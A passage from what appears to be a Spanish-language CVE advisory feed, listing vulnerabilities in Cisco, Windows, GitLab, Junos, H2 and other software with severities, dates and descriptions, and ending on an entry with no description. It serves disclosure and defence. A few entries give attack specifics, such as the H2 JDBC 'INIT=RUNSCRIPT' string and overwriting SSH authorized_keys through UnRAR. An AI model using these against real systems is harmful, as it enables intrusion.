    Una vulnerabilidad en la interfaz de servicios web del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) podría permitir a un atacante remoto no autenticado desencadenar una condición de denegación de servicio (DoS). Esta vulnerabilidad es debido a una comprobación inapropiada de entradas cuando son analizadas las peticiones HTTPS. Un atacante podría explotar esta vulnerabilidad mediante el envío de una petición HTTPS maliciosa a un dispositivo afectado. Una explotación con éxito podría permitir al atacante causar que el dispositivo se recargue, resultando en una condición de DoS
  • CVE-2022-21884
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Local Security Authority Subsystem Service
  • Vulnerabilidad en el envío de una petición HTTPS en la interfaz de servicios web del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) (CVE-2021-34704)
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la interfaz de servicios web del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) podría permitir a un atacante remoto no autenticado desencadenar una condición de denegación de servicio (DoS). Esta vulnerabilidad es debido a una comprobación inapropiada de entradas cuando son analizadas las peticiones HTTPS. Un atacante podría explotar esta vulnerabilidad mediante el envío de una petición HTTPS maliciosa a un dispositivo afectado. Una explotación con éxito podría permitir al atacante causar la recarga del dispositivo, resultando en una condición de DoS
  • CVE-2022-21897
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Common Log File System Driver. Este ID de CVE es diferente de CVE-2022-21916
  • CVE-2022-21885
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Remote Access Connection Manager. Este ID de CVE es diferente de CVE-2022-21914
  • CVE-2022-21887
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Win32k. Este ID de CVE es diferente de CVE-2022-21882
  • CVE-2022-21899
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Vulnerabilidad de Omisión de la Funcionalidad de Seguridad de Windows Extensible Firmware Interface
  • CVE-2022-21901
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Hyper-V
  • CVE-2022-21903
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows GDI
  • CVE-2022-21904
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información en Windows GDI
  • CVE-2022-21914
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Remote Access Connection Manager. Este ID de CVE es diferente de CVE-2022-21885
  • CVE-2022-21908
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Installer
  • CVE-2022-21910
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Microsoft Cluster Port Driver
  • CVE-2022-21913
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Omisión de la Funcionalidad de Seguridad de Local Security Authority (Domain Policy) Remote
  • CVE-2022-21915
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información en Windows GDI+. Este ID de CVE es diferente de CVE-2022-21880
  • CVE-2022-21918
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Denegación de Servicio en DirectX Graphics Kernel File
  • CVE-2022-21916
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios de Windows Common Log File System Driver. Este ID de CVE es diferente de CVE-2022-21897
  • CVE-2022-21919
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows User Profile Service. Este ID de CVE es diferente de CVE-2022-21895
  • CVE-2022-21920
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Kerberos
  • CVE-2021-39633
    Severidad: BAJA
    Fecha de publicación: 14/01/2022
    Fecha de última actualización: 08/08/2023
    En la función gre_handle_offloads del archivo ip_gre.c, se presenta un posible fallo de página debido a un acceso a memoria no válido. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android kernel, ID de Android: A-150694665, Referencias: Kernel ascendente
  • CVE-2021-1037
    Severidad: MEDIA
    Fecha de publicación: 14/01/2022
    Fecha de última actualización: 08/08/2023
    La emisión que la función DevicePickerFragment envía cuando es emparejado un nuevo dispositivo no presenta ninguna comprobación de permisos, por lo que cualquier aplicación puede registrarse para escucharla. Esto permite a las aplicaciones realizar un seguimiento de los dispositivos emparejados sin solicitar permisos BLUETOOTH. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-9, ID de Android: A-162951906
  • CVE-2021-29701
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    IBM Engineering Workflow Management versiones 7.0, 7.0.1 y 7.0.2, así como IBM Rational Team Concert versiones 6.0.6 y 6.0.6.1, podrían permitir a un atacante autenticado conseguir información confidencial de las definiciones de compilación que podría ayudar a realizar más ataques contra el sistema. X-Force ID: 200657
  • CVE-2021-45763
    Severidad: MEDIA
    Fecha de publicación: 14/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que GPAC versión v1.1.0, contiene una llamada no válida en la función gf_node_changed(). Esta vulnerabilidad puede conllevar a una denegación de servicio (DoS)
  • CVE-2022-21954
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Microsoft Edge (basado en Chromium). Este ID de CVE es diferente de CVE-2022-21970
  • CVE-2021-35587
    Severidad: ALTA
    Fecha de publicación: 19/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en el producto Oracle Access Manager de Oracle Fusion Middleware (componente: OpenSSO Agent). Las versiones compatibles que están afectadas son 11.1.2.3.0, 12.2.1.3.0 y 12.2.1.4.0. Una vulnerabilidad explotable fácilmente, permite a un atacante no autenticado con acceso a la red por medio de HTTP comprometer a Oracle Access Manager. Los ataques con éxito de esta vulnerabilidad pueden resultar en la toma de control de Oracle Access Manager. CVSS 3.1, Puntuación base 9.8 (impactos en la Confidencialidad, Integridad y Disponibilidad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • CVE-2022-21673
    Severidad: BAJA
    Fecha de publicación: 18/01/2022
    Fecha de última actualización: 24/07/2023
    Grafana es una plataforma de código abierto para la monitorización y la observabilidad. En las versiones afectadas, cuando una fuente de datos tiene habilitada la funcionalidad Forward OAuth Identity, el envío de una consulta a esa fuente de datos con un token de API (y sin otras credenciales de usuario) reenviará la OAuth Identity del usuario que haya iniciado sesión más recientemente. Esto puede permitir a poseedores de tokens de API recuperar datos a los que no presentan acceso previsto. Este ataque depende de que la instancia de Grafana tenga fuentes de datos que soporten la funcionalidad Forward OAuth Identity, de que la instancia de Grafana tenga una fuente de datos con la función Forward OAuth Identity activada, de que la instancia de Grafana tenga OAuth habilitado y de que la instancia de Grafana tenga claves de API usables. Este problema ha sido corregido en las versiones 7.5.13 y 8.3.4
  • CVE-2021-44838
    Severidad: MEDIA
    Fecha de publicación: 18/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Delta RM versión 1.2. Usando el endpoint /risque/risque/ajax-details, con una petición POST indicando el riesgo a acceder con el parámetro id, es posible que usuarios accedan a riesgos de otras empresas
  • CVE-2021-34405
    Severidad: MEDIA
    Fecha de publicación: 18/01/2022
    Fecha de última actualización: 08/08/2023
    Las distribuciones Linux de NVIDIA contienen una vulnerabilidad en la función TEE_Malloc de TrustZone, en la que un valor de retorno no comprobado que causa una desreferencia de puntero null puede conllevar a una denegación de servicio
  • CVE-2022-0172
    Severidad: MEDIA
    Fecha de publicación: 18/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GitLab CE/EE que afecta a todas las versiones a partir de la 12.3. Bajo determinadas condiciones era posible omitir la restricción de IP para proyectos públicos mediante GraphQL permitiendo a usuarios no autorizados leer títulos de incidencias, peticiones de fusión e hitos
  • CVE-2022-0125
    Severidad: MEDIA
    Fecha de publicación: 18/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GitLab que afecta a todas las versiones a partir de la 12.0 anteriores a 14.4.5, todas las versiones a partir de la 14.5.0 anteriores a 14.5.3, todas las versiones a partir de la 14.6.0 anteriores a 14.6.2. GitLab no verificaba que un mantenedor de un proyecto tuviera el acceso correcto para importar miembros de un proyecto de destino
  • CVE-2022-0124
    Severidad: MEDIA
    Fecha de publicación: 18/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema que afecta a las versiones de GitLab anteriores a 14.4.5, entre 14.5.0 y 14.5.3, y entre 14.6.0 y 14.6.1. La integración de Gitlab con Slack comprueba incorrectamente las entradas de los usuarios y permite que se diseñen URLs maliciosas que se envían a Slack
  • CVE-2022-0093
    Severidad: MEDIA
    Fecha de publicación: 18/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema que afecta a versiones de GitLab anteriores a 14.4.5, entre 14.5.0 y 14.5.3, y entre 14.6.0 y 14.6.1. GitLab permite que un usuario con una contraseña caducada acceda a información confidencial mediante canales RSS
  • CVE-2021-39892
    Severidad: MEDIA
    Fecha de publicación: 18/01/2022
    Fecha de última actualización: 08/08/2023
    En todas las versiones de GitLab CE/EE desde la versión 12.0, un usuario con bajos privilegios puede importar usuarios de proyectos en los que no presenta rol de mantenedor y revelar las direcciones de correo electrónico de esos usuarios
  • CVE-2022-21310
    Severidad: MEDIA
    Fecha de publicación: 19/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en el producto MySQL Cluster de Oracle MySQL (componente: Cluster: General). Las versiones compatibles que están afectadas son 7.4.34 y anteriores, 7.5.24 y anteriores, 7.6.20 y anteriores y 8.0.27 y anteriores. Una vulnerabilidad difícil de explotar permite a un atacante muy privilegiado con acceso al segmento de comunicación física conectado al hardware donde es ejecutado el MySQL Cluster comprometer a MySQL Cluster. Los ataques con éxito requieren la interacción humana de una persona diferente del atacante. Los ataques con éxito de esta vulnerabilidad pueden resultar en la toma de control de MySQL Cluster. CVSS 3.1, Puntuación base 6.3 (impactos en la Confidencialidad, Integridad y Disponibilidad). Vector CVSS: (CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H)
  • CVE-2022-23221
    Severidad: ALTA
    Fecha de publicación: 19/01/2022
    Fecha de última actualización: 08/08/2023
    H2 Console versiones anteriores a 2.1.210, permite a atacantes remotos ejecutar código arbitrario por medio de una URL jdbc:h2:mem JDBC que contenga la subcadena IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT, una vulnerabilidad diferente a CVE-2021-42392
  • CVE-2022-22310
    Severidad: MEDIA
    Fecha de publicación: 19/01/2022
    Fecha de última actualización: 08/08/2023
    IBM WebSphere Application Server Liberty versiones 21.0.0.10 hasta 21.0.0.12, podría proporcionar una seguridad más débil de lo esperado. Un atacante remoto podría explotar esta debilidad para obtener información confidencial y conseguir acceso no autorizado a las aplicaciones JAX-WS. IBM X-Force ID: 217224
  • CVE-2021-44837
    Severidad: MEDIA
    Fecha de publicación: 19/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Delta RM versión 1.2. Es posible que un usuario no privilegiado acceda a la misma información que un usuario administrador respecto a la información de creación de riesgos en el endpoint /risque/administration/referentiel/json/create/categorie, usando el parámetro de consulta id_cat1 para indicar el riesgo
  • CVE-2022-0166
    Severidad: ALTA
    Fecha de publicación: 19/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de escalada de privilegios en McAfee Agent versiones anteriores a 5.7.5. McAfee Agent usa el archivo openssl.cnf durante el proceso de construcción para especificar la variable OPENSSLDIR como un subdirectorio dentro del directorio de instalación. Un usuario con bajos privilegios podría haber creado subdirectorios y ejecutar código arbitrario con privilegios SYSTEM creando la ruta apropiada al archivo openssl.cnf malicioso creado específicamente
  • CVE-2022-22159
    Severidad: MEDIA
    Fecha de publicación: 19/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en la funcionalidad NETISR network queue del kernel del Sistema Operativo Junos de Juniper Networks permite a un atacante causar una denegación de servicio (DoS) mediante el envío de paquetes genuinos diseñados a un dispositivo. Durante un ataque, la CPU del demonio del protocolo de enrutamiento (rpd) puede alcanzar el 100% de uso, aunque las CPU de la FPC que reenvían el tráfico funcionarán normalmente. Este ataque es producido cuando los paquetes de los atacantes son enviados a través de una selección unilista de enrutamiento IPv4 unicast de igual coste y múltiples rutas (ECMP). La recepción y el procesamiento continuos de estos paquetes crearán una condición sostenida de denegación de servicio (DoS). Un indicador de compromiso puede ser monitorear las caídas de NETISR en la red con la ayuda de JTAC. Por favor, póngase en contacto con el JTAC para el apoyo técnico para obtener más orientación. Este problema afecta: Juniper Networks Junos OS 17.3 versión 17.3R3-S9 y versiones posteriores anteriores a 17.3R3-S12; 17.4 versión 17.4R3-S3 y versiones posteriores anteriores a 17.4R3-S5; 18.1 versión 18.1R3-S11 y versiones posteriores anteriores a 18.1R3-S13; 18. 2 versión 18.2R3-S6 y versiones posteriores; 18.3 versión 18.3R3-S4 y versiones posteriores anteriores a 18.3R3-S5; 18.4 versión 18.4R3-S5 y versiones posteriores anteriores a 18.4R3-S9; 19.1 versión 19.1R3-S3 y versiones posteriores anteriores a 19.1R3-S7. Este problema no afecta a versiones del Sistema Operativo Junos de Juniper Networks anteriores a 17.3R3-S9. Este problema no afecta a Juniper Networks Junos OS Evolved
  • CVE-2022-22155
    Severidad: BAJA
    Fecha de publicación: 19/01/2022
    Fecha de última actualización: 24/07/2023
    Una vulnerabilidad de consumo no controlado de recursos en el manejo de eventos de cambio de estado de vecinos IPv6 en Juniper Networks Junos OS permite a un atacante adyacente causar una pérdida de memoria en el concentrador PIC flexible (FPC) de un router ACX5448. El aleteo continuo de un vecino IPv6 con una temporización específica causará que el FPC quede sin recursos, conllevando a una condición de denegación de servicio (DoS). Una vez que es producida la condición, el procesamiento posterior de paquetes estará afectado, creando una condición de denegación de servicio (DoS) sostenida, que requerirá un reinicio manual de la FPC para restaurar el servicio. Los siguientes mensajes de error se verán después de que los recursos del FPC hayan sido agotados: fpc0 DNX_NH::dnx_nh_tag_ipv4_hw_install(),3135: dnx_nh_tag_ipv4_hw_install: BCM L3 Egress create object failed for NH 602 (-14:No resources for operation), BCM NH Params: unit:0 Port:41, L3_INTF:0 Flags: 0x40 fpc0 DNX_NH::dnx_nh_tag_ipv4_hw_install(),3135: dnx_nh_tag_ipv4_hw_install: BCM L3 Egress create object failed for NH 602 (-14:No resources for operation), BCM NH Params: unit:0 Port:41, L3_INTF:0 Flags: 0x40 fpc0 DNX_NH::dnx_nh_tag_ipv4_hw_install(),3135: dnx_nh_tag_ipv4_hw_install: BCM L3 Egress create object failed for NH 602 (-14:No resources for operation), BCM NH Params: unit:0 Port:41, L3_INTF:0 Flags: 0x40 fpc0 DNX_NH::dnx_nh_tag_ipv4_hw_install(),3135: dnx_nh_tag_ipv4_hw_install: BCM L3 Egress create object failed for NH 602 (-14:No resources for operation), BCM NH Params: unit:0 Port:41, L3_INTF:0 Flags: 0x40 Este problema sólo afecta al router ACX5448. Esta vulnerabilidad no afecta a otros productos o plataformas. Este problema afecta a Juniper Networks Junos OS en ACX5448: versiones 18.4 anteriores a 18.4R3-S10; versiones 19.1 anteriores a 19.1R3-S5; versiones 19.2 anteriores a 19.2R1-S8, 19.2R3-S2; versiones 19. 3 versiones anteriores a 19.3R2-S6, 19.3R3-S2; 19.4 versiones anteriores a 19.4R1-S3, 19.4R2-S2, 19.4R3; 20.1 versiones anteriores a 20.1R2; 20.2 versiones anteriores a 20.2R1-S1, versión 20.2R2
  • CVE-2022-22820
    Severidad: MEDIA
    Fecha de publicación: 20/01/2022
    Fecha de última actualización: 08/08/2023
    Debido a una falta de comprobaciones de archivos multimedia antes de la renderización, era posible que un atacante causara un consumo anormal de CPU para el destinatario del mensaje mediante el envío de una imagen gif especialmente diseñada en LINE para Windows versiones anteriores a 7.4
  • CVE-2021-34600
    Severidad: MEDIA
    Fecha de publicación: 20/01/2022
    Fecha de última actualización: 09/08/2023
    Las versiones de Telenot CompasX anteriores a la 32.0 utilizan una semilla débil para la generación de números aleatorios, lo que hace que las claves AES utilizadas en las etiquetas NFC para la autorización local de los usuarios sean predecibles. Esto puede llevar a la pérdida total de la fiabilidad de la instalación
  • CVE-2021-39191
    Severidad: MEDIA
    Fecha de publicación: 03/09/2021
    Fecha de última actualización: 24/07/2023
    mod_auth_openidc es un módulo de autenticación/autorización para el servidor HTTP Apache versión 2.x, que funciona como OpenID Connect Relying Party, autenticando a usuarios contra un proveedor de OpenID Connect. En las versiones anteriores a 2.4.9.4, la funcionalidad de SSO init de terceros de mod_auth_openidc era vulnerable a un ataque de redirección abierta mediante el suministro de una URL diseñada en el parámetro "target_link_uri". Un parche en la versión 2.4.9.4 hizo que la configuración "OIDCRedirectURLsAllowed" se aplicara al parámetro "target_link_uri". No se conocen soluciones aparte de la actualización a una versión parcheada
  • CVE-2022-25508
    Severidad: MEDIA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso en el componente /ManageRoute/postRoute de FreeTAKServer versión v1.9.8, permite a atacantes no autenticados causar una Denegación de Servicio (DoS) por medio de una cantidad inusualmente grande de rutas creadas, o crear rutas inseguras o falsas para usuarios legítimos
  • CVE-2022-26878
    Severidad: BAJA
    Fecha de publicación: 11/03/2022
    Fecha de última actualización: 08/08/2023
    El archivo drivers/bluetooth/virtio_bt.c en el kernel de Linux versiones anteriores a 5.16.3, presenta una pérdida de memoria (los búferes de los sockets presentan memoria asignada pero no liberada)
  • CVE-2022-25623
    Severidad: ALTA
    Fecha de publicación: 04/03/2022
    Fecha de última actualización: 08/08/2023
    Symantec Management Agent es susceptible a una vulnerabilidad de escalada de privilegios. Una cuenta local de bajos privilegios puede ser elevada al nivel SYSTEM mediante manipulaciones del registro
  • CVE-2022-23232
    Severidad: MEDIA
    Fecha de publicación: 04/03/2022
    Fecha de última actualización: 08/08/2023
    StorageGRID (anteriormente conocido como StorageGRID Webscale) versiones anteriores a 11.6.0, son susceptibles a una vulnerabilidad que, cuando es explotada con éxito, podría permitir que las cuentas de usuarios externos deshabilitadas, caducadas o bloqueadas accedan a los datos de S3 a los que presentaban acceso anteriormente. StorageGRID versión 11.6.0 obtiene el estado de la cuenta de usuario desde Active Directory o Azure y bloqueará el acceso a S3 de las cuentas de usuario deshabilitadas durante la posterior sincronización en segundo plano. Las cuentas de usuario caducadas o bloqueadas para Active Directory o Azure, o las cuentas de usuario deshabilitadas, caducadas o bloqueadas en fuentes de identidad distintas de Active Directory o Azure deben eliminarse manualmente de las membresías de grupo o eliminarse manualmente sus claves de S3 desde Tenant Manager en todas las versiones de StorageGRID (antes StorageGRID Webscale)
  • CVE-2022-0384
    Severidad: MEDIA
    Fecha de publicación: 07/03/2022
    Fecha de última actualización: 02/08/2023
    El plugin Video Conferencing with Zoom de WordPress versiones anteriores a 3.8.17, no presenta autorización en su acción AJAX vczapi_get_wp_users, permitiendo a cualquier usuario autenticado, como el suscriptor, descargar la lista de direcciones de correo electrónico registradas en el blog
  • CVE-2022-25636
    Severidad: MEDIA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 21/07/2023
    El archivo net/netfilter/nf_dup_netdev.c en el kernel de Linux versiones 5.4 hasta 5.6.10, permite a usuarios locales alcanzar privilegios debido a una escritura fuera de los límites de la pila. Esto está relacionado con nf_tables_offload
  • Vulnerabilidad en la funcionalidad de análisis de respuesta de DNS en Nucleus 4 Nucleus NET, Nucleus RTOS, Nucleus ReadyStart , Nucleus Source Code, SIMOTICS CONNECT 400 y VSTAR (CVE-2020-27737)
    Severidad: MEDIA
    Fecha de publicación: 22/04/2021
    Fecha de última actualización: 08/08/2023
    Se ha identificado una vulnerabilidad en Nucleus NET (Todas las versiones), Nucleus ReadyStart V3 (Todas las versiones anteriores a la versión V2017.02.3), Nucleus ReadyStart V4 (Todas las versiones anteriores a la versión V4.1.0), Nucleus Source Code (Versiones que incluyen los módulos DNS afectados), SIMOTICS CONNECT 400 (Todas las versiones anteriores a la versión V0.5.0.0). La funcionalidad de análisis de la respuesta DNS no valida correctamente varias longitudes y recuentos de los registros. El análisis sintáctico de respuestas malformadas podría dar lugar a una lectura más allá del final de una estructura asignada. Un atacante con una posición privilegiada en la red podría aprovechar esta vulnerabilidad para causar una condición de denegación de servicio o filtrar la memoria más allá de la estructura asignada
  • CVE-2022-24193
    Severidad: ALTA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 31/07/2023
    Se ha detectado que CasaOS versiones anteriores a v0.2.7 contiene una vulnerabilidad de inyección de comandos
  • CVE-2022-22814
    Severidad: ALTA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    El servicio System Diagnosis de MyASUS versiones anteriores a 3.1.2.0, permite una escalada de privilegios
  • CVE-2022-20060
    Severidad: MEDIA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    En preloader (usb), se presenta una posible omisión de permisos debido a una falta de autenticación de imagen apropiada. Esto podría conllevar a una escalada local de privilegios, para un atacante que tenga acceso físico al dispositivo, sin ser necesarios privilegios de ejecución adicionales. Es requerida una interacción del usuario para su explotación. ID del parche: ALPS06160806; ID de Incidencia: ALPS06137462
  • CVE-2021-40051
    Severidad: MEDIA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de acceso no autorizado en los componentes del sistema. Una explotación con éxito de esta vulnerabilidad afectará a la confidencialidad
  • CVE-2021-34122
    Severidad: MEDIA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 17/08/2023
    La función bitstr_tell en el archivo bitstr.c en el commit 4ab404e de ffjpeg presenta una desreferencia de puntero NULL
  • CVE-2022-22351
    Severidad: ALTA
    Fecha de publicación: 07/03/2022
    Fecha de última actualización: 08/08/2023
    IBM AIX versiones 7.1, 7.2, 7.3 y VIOS 3.1 podrían permitir a un usuario de host de confianza sin privilegios explotar una vulnerabilidad en el demonio nimsh para causar una denegación de servicio en el demonio nimsh en otro host de confianza. ID de IBM X-Force: 220396
  • CVE-2021-41849
    Severidad: BAJA
    Fecha de publicación: 11/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Luna Simo versión PPR1.180610.011/202001031830. Envía la siguiente Información de Identificación Personal (PII) en texto plano usando HTTP a servidores ubicados en China: la lista de aplicaciones instaladas por el usuario y la identidad internacional de equipo móvil (IMEI) del dispositivo. Esta PII es transmitida a log.skyroam.com.cn mediante HTTP, independientemente de que el usuario use el software Simo
  • CVE-2022-0907
    Severidad: MEDIA
    Fecha de publicación: 11/03/2022
    Fecha de última actualización: 08/08/2023
    Un Valor de Retorno no Comprobado a una Desreferencia de Puntero NULL in tiffcrop in libtiff versión 4.3.0 permite a atacantes causar una denegación de servicio por medio de un archivo tiff diseñado. Para usuarios que compilan libtiff desde las fuentes, la corrección está disponible con el commit f2b656e2
  • CVE-2021-33150
    Severidad: MEDIA
    Fecha de publicación: 11/03/2022
    Fecha de última actualización: 08/08/2023
    El hardware permite una activación de la lógica de prueba o depuración en tiempo de ejecución para algunas instancias del Intel(R) Trace Hub, lo que puede permitir que un usuario no autenticado habilite potencialmente la escalada de privilegios por medio del acceso físico
  • CVE-2021-26341
    Severidad: BAJA
    Fecha de publicación: 11/03/2022
    Fecha de última actualización: 08/08/2023
    Algunas CPUs de AMD pueden ejecutar transitoriamente más allá de las ramas directas no condicionales, lo que puede potencialmente resultar en un filtrado de datos
  • CVE-2022-24433
    Severidad: ALTA
    Fecha de publicación: 11/03/2022
    Fecha de última actualización: 08/08/2023
    El paquete simple-git versiones anteriores a 3.3.0, es vulnerable a una Inyección de Comandos por medio de una inyección de argumentos. Cuando es llamado a la función .fetch(remote, branch, handlerFn), los parámetros remote y branch son pasados al subcomando git fetch. Inyectando algunas opciones de git era posible conseguir una ejecución arbitraria de comandos
  • CVE-2022-26143
    Severidad: ALTA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    El componente TP-240 (también conocido como tp240dvr) en Mitel MiCollab versiones anteriores a 9.4 SP1 FP1 y MiVoice Business Express versiones hasta 8.1, permite a atacantes remotos obtener información confidencial y causar una denegación de servicio (degradación del rendimiento y tráfico saliente excesivo). Esto fue explotado "in the wild" en febrero y marzo de 2022 para el ataque DDoS TP240PhoneHome
  • CVE-2022-26318
    Severidad: ALTA
    Fecha de publicación: 04/03/2022
    Fecha de última actualización: 08/08/2023
    En los dispositivos WatchGuard Firebox y XTM, un usuario no autenticado puede ejecutar código arbitrario, también conocido como FBX-22786. Esta vulnerabilidad afecta a Fireware OS antes de 12.7.2_U2, 12.x antes de 12.1.3_U8, y 12.2.x hasta 12.5.x antes de 12.5.9_U2
  • CVE-2018-25032
    Severidad: MEDIA
    Fecha de publicación: 25/03/2022
    Fecha de última actualización: 04/08/2023
    zlib versiones anteriores a 1.2.12 permite la corrupción de memoria al desinflar (es decir, al comprimir) si la entrada tiene muchas coincidencias distantes
  • CVE-2022-22665
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de lógica con una comprobación mejorada. Este problema es corregido en macOS Monterey versión 12.3. Una aplicación maliciosa puede conseguir privilegios de root
  • CVE-2022-22589
    Severidad: MEDIA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de comprobación con un saneo de entradas mejorado. Este problema es corregido en iOS versión 15.3 y iPadOS versión 15.3, watchOS versión 8.4, tvOS versión 15.3, Safari versión 15.3, macOS Monterey versión 12.2. El procesamiento de un mensaje de correo diseñado de forma maliciosa puede conllevar a una ejecución de javascript arbitrario
  • CVE-2022-22481
    Severidad: MEDIA
    Fecha de publicación: 09/05/2022
    Fecha de última actualización: 08/08/2023
    IBM Navigator para i versiones 7.2, 7.3 y 7.4 (versión de herencia), podría permitir a un atacante remoto obtener acceso a la interfaz web sin credenciales válidas. Al modificar la petición de inicio de sesión, un atacante puede obtener visibilidad del nombre de dominio completo del sistema de destino y de la página de tareas del navegador, pero no puede llevar a cabo esas tareas en el sistema ni visualizar ningún dato específico del mismo. IBM X-Force ID: 225899
  • CVE-2022-30330
    Severidad: MEDIA
    Fecha de publicación: 07/05/2022
    Fecha de última actualización: 08/08/2023
    En el firmware KeepKey anterior a la versión 7.3.2, se pueden aprovechar los fallos de la interfaz del supervisor para eludir importantes restricciones de seguridad en las operaciones del firmware. Utilizando estos defectos, un código de firmware malicioso puede elevar los privilegios, inutilizar permanentemente el dispositivo o sobrescribir el código del cargador de arranque de confianza para comprometer la cartera de hardware a través de reinicios o borrados de almacenamiento
  • CVE-2022-22475
    Severidad: MEDIA
    Fecha de publicación: 17/05/2022
    Fecha de última actualización: 08/08/2023
    IBM WebSphere Application Server Liberty y Open Liberty 17.0.0.3 a 22.0.0.5 son vulnerables a la suplantación de identidad por parte de un usuario autenticado. ID de IBM X-Force: 225603
  • CVE-2022-30334
    Severidad: MEDIA
    Fecha de publicación: 07/05/2022
    Fecha de última actualización: 08/08/2023
    Brave versiones anteriores a 1.34, cuando se usa una Ventana Privada con Conectividad Tor, filtra URLs .onion en los encabezados Referer y Origin. NOTA: aunque esto fue arreglado por Brave, la documentación de Brave todavía aconseja "Tenga en cuenta que las Ventanas Privadas con Conectividad Tor en Brave son sólo ventanas privadas regulares que usan Tor como proxy. Brave NO implementa la mayoría de las protecciones de privacidad del Navegador Tor"
  • CVE-2022-30333
    Severidad: MEDIA
    Fecha de publicación: 09/05/2022
    Fecha de última actualización: 17/08/2023
    RARLAB UnRAR versiones hasta 6.12, en Linux y UNIX permite un salto de directorio para escribir en los archivos durante una operación de extracción (también se conoce como desempaquetado), como es demostrado creando un archivo ~/.ssh/authorized_keys. NOTA: WinRAR y Android RAR no están afectados
  • CVE-2022-28165
    Severidad: MEDIA
    Fecha de publicación: 06/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en la funcionalidad de control de acceso basado en roles (RBAC) de Brocade SANNav versiones anteriores a 2.2.0 podría permitir a un atacante remoto autenticado acceder a recursos a los que no debería poder acceder y llevar a cabo acciones que no debería poder realizar. La vulnerabilidad se presenta porque no son llevados a cabo restricciones en el lado del servidor para asegurar que el usuario presenta permiso requerido antes de procesar las peticiones
  • CVE-2022-29303
    Severidad: ALTA
    Fecha de publicación: 12/05/2022
    Fecha de última actualización: 08/08/2023
